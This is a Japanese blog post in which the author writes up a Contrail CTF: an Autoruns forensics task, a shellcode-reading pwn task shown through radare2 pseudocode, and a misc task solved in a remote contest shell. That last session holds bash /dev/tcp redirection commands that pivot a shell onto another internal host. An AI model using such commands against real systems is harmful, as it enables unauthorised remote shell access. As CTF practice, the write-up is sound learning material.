-- date: 2020-01-04 description: 'Contrail CTF 参加記録' tags:

• CTF

---

Contrail CTF 参加記録と解き直し

SCBで出て, Score302, 25位でした。 そのうち, 私は以下の問題を解きました。

• debug_port: network
• Persistence: forensics

では, 解き直しをやっていき

forensics

Persistence

.arnファイルが与えられます。
これはAutorunsの拡張子なので, 開いて中身を確認します。

Task Schedulerに\Evilというプロセスが残っているので中身を確認するとflagがあります。

alice's password

正しくunzipできないzipファイルとdataが与えられます。

Pwn

EasyShellCode

20Byte(0x14)までしかread()してくれない。 そのあとはシェルコードを実行してくれる。

radare2で逆アセンブルする。

# r2 problem 
[0x00000710]> aaaa
[Cannot analyze at 0x00000700g with sym. and entry0 (aa)
[x] Analyze all flags starting with sym. and entry0 (aa)
[Cannot analyze at 0x00000700ac)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables
[0x00000710]> s main
[0x0000081a]> pdd
/* r2dec pseudo code output */
/* problem @ 0x81a */
#include <stdint.h>
 
int32_t main (void) {
    rax = *(fs:0x28);
    *((rbp - 8)) = rax;
    eax = 0;
    r9d = 0;
    r8d = 0;
    rax = mmap (0, 0x64, 7, 0x22, r8d, r9d);
    *((rbp - 0x10)) = rax;
    eax = 0;
    printf ("Input your shellcode: ");
    rax = stdout;
    fflush (*(obj.stdout));
    rax = *((rbp - 0x10));
    read (0, rax, 0x14);
    rax = *((rbp - 0x10));
    edx = 7;
    esi = 0x64;
    rdi = rax;
    mprotect ();
    rax = rbp - 0x10;
    rdx = 0;
    rdi = 0;
    rsi = 0;
    rbx = 0;
    rcx = 0;
    r8 = 0;
    r9 = 0;
    r10 = 0;
    r11 = 0;
    r12 = 0;
    r13 = 0;
    r14 = 0;
    r15 = 0;
    rbp = 0;
    return uint64_t (*rax)() ();
}

最後の行でuint64_t (*rax)() ();を実行しているので, read (0, rax, 0x14);でシェルコードを読み込めれば問題なく実行できそう。

これは, 引数が空で返り値がuint64_tな関数へのポインタであり, raxから始まるアドレスに格納されているアドレスを間接参照で読み出します。

• 詳しくはこちらを見ると良い (opens new window)

Misc

Let's connct

$ nc 114.177.250.4 2999
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ help
help
GNU bash, version 4.4.20(1)-release (x86_64-pc-linux-gnu)
These shell commands are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.

A star (*) next to a name means that the command is disabled.

 job_spec [&]                            history [-c] [-d offset] [n] or hist>
 (( expression ))                        if COMMANDS; then COMMANDS; [ elif C>
 . filename [arguments]                  jobs [-lnprs] [jobspec ...] or jobs >
 :                                       kill [-s sigspec | -n signum | -sigs>
 [ arg... ]                              let arg [arg ...]
 [[ expression ]]                        local [option] name[=value] ...
 alias [-p] [name[=value] ... ]          logout [n]
 bg [job_spec ...]                       mapfile [-d delim] [-n count] [-O or>
 bind [-lpsvPSVX] [-m keymap] [-f file>  popd [-n] [+N | -N]
 break [n]                               printf [-v var] format [arguments]
 builtin [shell-builtin [arg ...]]       pushd [-n] [+N | -N | dir]
 caller [expr]                           pwd [-LP]
 case WORD in [PATTERN [| PATTERN]...)>  read [-ers] [-a array] [-d delim] [->
 cd [-L|[-P [-e]] [-@]] [dir]            readarray [-n count] [-O origin] [-s>
 command [-pVv] command [arg ...]        readonly [-aAf] [name[=value] ...] o>
 compgen [-abcdefgjksuv] [-o option] [>  return [n]
 complete [-abcdefgjksuv] [-pr] [-DE] >  select NAME [in WORDS ... ;] do COMM>
 compopt [-o|+o option] [-DE] [name ..>  set [-abefhkmnptuvxBCHP] [-o option->
 continue [n]                            shift [n]
 coproc [NAME] command [redirections]    shopt [-pqsu] [-o] [optname ...]
 declare [-aAfFgilnrtux] [-p] [name[=v>  source filename [arguments]
 dirs [-clpv] [+N] [-N]                  suspend [-f]
 disown [-h] [-ar] [jobspec ... | pid >  test [expr]
 echo [-neE] [arg ...]                   time [-p] pipeline
 enable [-a] [-dnps] [-f filename] [na>  times
 eval [arg ...]                          trap [-lp] [[arg] signal_spec ...]
 exec [-cl] [-a name] [command [argume>  true
 exit [n]                                type [-afptP] name [name ...]
 export [-fn] [name[=value] ...] or ex>  typeset [-aAfFgilnrtux] [-p] name[=v>
 false                                   ulimit [-SHabcdefiklmnpqrstuvxPT] [l>
 fc [-e ename] [-lnr] [first] [last] o>  umask [-p] [-S] [mode]
 fg [job_spec]                           unalias [-a] name [name ...]
 for NAME [in WORDS ... ] ; do COMMAND>  unset [-f] [-v] [-n] [name ...]
 for (( exp1; exp2; exp3 )); do COMMAND>  until COMMANDS; do COMMANDS; done
 function name { COMMANDS ; } or name >  variables - Names and meanings of so>
 getopts optstring name [arg]            wait [-n] [id ...]
 hash [-lr] [-p pathname] [-dt] [name >  while COMMANDS; do COMMANDS; done
 help [-dms] [pattern ...]               { COMMANDS ; }
bash-4.4history
history
    1  help
    2  history
bash-4.4$ history
history
    1  help
    2  history
    3  history
bash-4.4$ exec <> /dev/tcp/172.17.0.10/3000
exec <> /dev/tcp/172.17.0.10/3000
bash: connect: Connection refused
bash: /dev/tcp/172.17.0.10/3000: Connection refused
bash-4.4$ ls
ls
bash
bin
dev
flag
lib
lib32
lib64
bash-4.4$ echo "$(<flag)"
 echo "$(<flag)"
Flag has moved to 3000 port on 172.17.0.5 .
bash-4.4$ exec 3<> /dev/tcp/172.17.0.5/3000; ./bash <&3

ref

• Contrail CTF writeup by aqua (opens new window)
• ContrailCTF_2019のwriteup by Tsubasa (opens new window)
• Contrail CTF WriteUp by ryoto (opens new window)
• Contrail CTF 2019のWriteup by ptr-yudai (opens new window)